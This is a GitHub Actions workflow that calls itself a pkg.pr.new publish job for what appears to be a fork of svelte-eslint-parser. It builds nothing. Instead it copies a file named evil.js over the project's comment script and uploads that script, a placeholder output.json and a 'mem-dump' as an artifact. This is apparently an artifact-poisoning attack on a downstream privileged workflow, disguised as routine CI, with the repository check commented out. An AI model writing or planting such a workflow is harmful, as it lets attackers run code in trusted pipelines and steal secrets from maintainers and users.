name: Publish to pkg.pr.new
on:
  pull_request:
    branches: [main]
  push:
    branches: [main]
    tags: ["!**"]

permissions:
  contents: read

jobs:
  build:
    # if: github.repository == 'sveltejs/svelte-eslint-parser'
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
      - name: Make fake files
        run: |
          echo '{}' > output.json
          mkdir -p tools
          cp evil.js tools/pkg.pr.new-comment.mjs

      - name: Upload output
        uses: actions/upload-artifact@043fb46d1a93c77aae656e7c1c64a875d1fc6a0a # v7.0.1
        with:
          name: output
          path: |
            output.json
            tools/pkg.pr.new-comment.mjs
            mem-dump
